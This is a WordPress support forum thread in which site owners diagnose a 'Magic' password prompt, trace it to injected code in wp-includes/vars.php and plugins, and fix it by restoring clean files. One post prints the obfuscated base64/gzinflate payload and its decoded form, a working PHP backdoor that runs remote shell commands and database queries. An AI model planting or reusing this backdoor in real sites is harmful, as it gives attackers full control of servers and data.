Posted 3 months ago #
I'm getting a strange error when I try to post, or edit posts (or add/edit any content). I get a browser alert window that says:
Authentication Required
A username and password are being requested by http://mysite.com. The site says: "Magic"
Then it requests user and password. User and password entry doesn't work.
I can log into the blog normally, without errors. I have reset my admin password, to no effect.
Did I get hacked or something? How can I fix this?
Posted 3 months ago #
I fixed the problem by reuploading the root files, the wp-admin folder and the wp-includes folder from a backup of the site that I made a week ago. I didn't touch the content folder.
If you don't have a backup, I imagine that if you download a fresh version from WordPress and recopy the files and folders listed above (being careful NOT to overwrite your wp-config file!), that would probably work, too. PIA, I know, but that's all I know to do until someone else figures out the source of the problem.
Posted 3 months ago #
Also, to clarify -- someone else pointed this out on another of my posts -- by replacing the "root files" I mean the files in the top-level folder. Replace them all but the wp-config file.
Posted 3 months ago #
Ok, thanks. I'll give that a shot.
Seems like a strange problem to have just out of the blue.
Posted 3 months ago #
I was getting the same message as well. Even though I was already at 2.8.2, I performed the upgrade procedure, and now the message is gone.
Posted 3 months ago #
I uploaded the files you suggested, in 3 groups:
1. root files
2. wp-admin directory
3. wp-includes directory
I tested after each one. It start working until the last files (wp-includes directory). If it happens again, I'll start there.
Posted 3 months ago #
Oops. I meant: It DIDN'T start working until I uploaded the wp-includes directory.
Posted 3 months ago #
Yeah I'm having this exact kind of problem right now, reuploaded /wp-admin directory - problem remains.. reuploaded root files - problem remains.. Right now reuploading /wp-includes directory - still uploading..
I only got this issue after installing the Plug-in "Tweet This", must have interfered with my other plug-ins?
EDIT: Finished reuploading /wp-includes and the problem has been solved!
Posted 3 months ago #
i'm having the same problem. how do i re-upload /wp-includes? thanks!
Posted 3 months ago #
i am using WP 2.7.1 - can i upload wp-includes from WP 2.8.2 or does it need to be the wp-includes from 2.7.1? if so, where can i get that?
Posted 3 months ago #
@robk: Go to the WordPress downloads area and it should have the old versions.
Posted 3 months ago #
i got the "Magic" thing to go away, but now i am having issues with the sidebar and some other things on the blog. do you think it's related? what else can i do to fix this problem? the blog i'm referring to:
Posted 3 months ago #
I assume this is some sort of attack as opposed to any form of error inherent to WordPress. I also fixed the problem for now by having it automatically reinstall WordPress.
There's at least one other post here discussing the problem:
http://wordpress.org/support/topic/295482
Posted 3 months ago #
robk30: Maybe your problem with sidebars is related to this problem but I wonder if it is coincidental. I had problems similar to yours recently and ultimately found it was because some formatting codes in text I had pasted in from another site had messed up WordPress. You might try checking recent posts to see if there are any html codes included, or try temporarily removing your posts from 7/30 to see if that fixes the problem.
Posted 3 months ago #
Encountered the "Magic" problem with a client using v2.5.1 this morning. We, at least temporarily, solved the problem by reverting the wp-includes directory to a backup copy.
We did a diff on the two directory and found that the vars.php file contained the infected code.
Posted 3 months ago #
Does seem like it might be malicious, doesn't it? Simple fix…but I'm not sure that more damage wasn't done. Fingers crossed, passwords changed, etc.
Posted 3 months ago #
This just started on one of my user's sites. It looks like a hack to me. Has anyone gotten to the root of the problem?
Posted 3 months ago #
I found that the WP sites could have been hacked using the Magic Shell script. You can find more information here:
http://iboughtamac.com/2008/03/28/protecting-wordpress-from-magic-include-shell/
Note that the information to remove the exploit is not the same in this case. Uploading a clean version of wp-includes/vars.php does fix it.
While doing the research to solve this, I found two extra files that had a similar script included (eval() of base64_decode()). They had been uploaded to a subdirectory on wp-content/uploads/ and were fonction.php and wp-links.php.
Good luck,
Tomi
Posted 1 month ago #
The following code was found on my clients WP site in two separate plug-ins. Code was found at the top of each page (when you click the edit link for the plugin).
eval(gzinflate(base64_decode('1VVtT9swEP7c/gpTVSSRukGrMhgF1gk6aRL7AIwPCCbjJhfqLW/YzkoH/e87Oy9NCUPAJqRVbZr4Od89z53v0rxtNrhP7BU/jVzF44jCDZdK2hY1H8l8kBMIAstxmg00bhSG5J6B3f4Rh6lyiDZqDHnEqQCpYgF2SxvRMPag5QzqaJxARMdMgsdFbtD2uGTjAGgRTZJdwoRgMxqyxLaU4KHVIXCTBOjVtjr4oH1egbKt2l7knrk1SiFM1IwUdHO+BqrlIGFSqolILYesrpIVHlHDoQJ0SJ1q6bOxtjYk8ZhKxYSyMwoonhS7Cw6DwrqNOUGhZhNKoW4cKYiQycLEYBB51A2ARQUwN1cIJDyoQ86kgrCmIl9+kYZs7+sp0EcMn8Ctq1hAjyspuS123OMP7iQm2uxJnB5k8wQeQ1IJ3THxCgI5xe8xj+zWRdRaRkt6HaLBh0gOCZe6s+JUuGC3faM30R1Wxmthk1XLm8ds5f4a0wkPAPtkSHyIffSxMC6s32qvvgDmIdwh3fVev+BoSNo1tIDnZQ+4QSw1w1r9zc1yyS5vM/Lzy0cKpS/4m+NSNtO4lKCw0enx6Oh0dPL13EomCd3wun1vi3U3e5v9dX9zfWurv9Fj7tjbeLfudt/3rG+5XhOjtfOUPTrjaaD28qLo4M+OSnZ3iQU/GU7aLN363tY9FLIr7tLrNFYg6VXi2g65uyM1RKSR4iEg+oFIHJCJDBiedFml4oYe6iPbpLY2yLJnKkD+QkDWE0bA/RfE/6blOgUxK8S0sxLjYQxn8jqgBnw1STgHpok3frPnjSeVV1lOymmWHZMd2mecWfrl7OTokGKw4zP66ePnw9HBNsG5k6kEIWJhV2JXJ4/HUc2AFL23SPfSCMopVjjmTZ0NzLz986HTFvG0TLEPyp1QfFfG7rKb6nQ4x1oRvS2fBNlf7kAA5DJLB4NFmiQIzgL+KyPpVEUtafpX2T053d8fjQ6WEsx8H1wFHkUFeBSm40qiiV4jhcWf0m4UZ8Quop21F4yrQjJ6wu9v'))); ?>
I expanded the eval code. Here is what it expanded to:
{
if (!function_exists('______safeshell'))
{
function ______safeshell($komut) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
if (!empty ($komut)) {
if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
//@ ob_start();
@ passthru($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('system') && !in_array('system', $disable_functions)) {
//@ ob_start();
@ system($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
$res = @ shell_exec($komut);
echo $res;
}
elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
@ exec($komut, $res);
$res = join("\n", $res);
echo $res, "\n";
}
elseif (@ is_resource($f = @ popen($komut, "r"))) {
//$res = "";
while (!@ feof($f)) {
//$res .= @ fread($f, 1024);
echo(@ fread($f, 1024));
}
@ pclose($f);
}
else
{
$res = <code>{$komut}</code>;
echo $res;
}
}
}
};
if (isset ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'])) {
echo "<php_5d14d8a172740f7088452acbd560c192_result>\n";
if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'eval') {
eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'exec') {
______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_5d14d8a172740f7088452acbd560c192'] == 'query') {
$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
if (!$result)
{
echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
die();
}
else if (is_resource($result))
{
$res = array();
while ($row = mysql_fetch_assoc($result))
{
$res[] = $row;
};
mysql_free_result($result);
echo serialize($res);
die();
}
else
{
echo "php_5d14d8a172740f7088452acbd560c192_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
die();
}
};
echo "\n</php_5d14d8a172740f7088452acbd560c192_result>\n";
die();
};
};Looks like it gives the ability to run shell commands and mysql DB queries via remote POST and GET requests.
Posted 1 month ago #
code was also found in the file:
wp-includes/vars.php
removed the malicious code from the top of the file and no longer see the 'Magic' login prompt.
Posted 1 month ago #
I had the same problem, uploaded the wp-includes/vars.php file, and got the site back.
I then upgraded to latest version, and removed the eval() ode from the top of one of my plugins.
Hopefully, I won't be having any more problems from now on!
Posted 1 month ago #
I hope people take the time to read all the way down to the bottom as it will save them a lot of time.
I just replaced the vars.php file as well and it's all good.
Thanks to those who contributed and paved the way to a simple fix!
Now does anyone know WHY it happens, or do we care?
Posted 1 month ago #
I am having the same issue. Can someone walk me through fixing it? Thanks.
Posted 1 month ago #
qmagnets and all, thank you!
Replacing the vars.php file did the trick.
I would very much like to know why it happened, though. If anyone knows or has a guess, I'm all ears.
Posted 1 month ago #
I had the same issues with getting the whole you must authenticate to enter the "MAGIC" area.
I replaced all of the root files, wp-admin, & wp-includes folder files with fresh copy of my 2.7.1 install and the issues went away.
with fresh copy of my 2.7.1 install and the issues went away
*sigh*
Upgrade to the latest version!
Don't just push the door to with the hope the burglars won't come back. Take down the flashing neon sign that says "PLEASE BURGLAR ME!", close the door and lock it.
Posted 2 weeks ago #
Alism, I can't upgrade. Each time I do it asks for my user name and password then tells me it's wrong. What do I do?
You must log in to post.
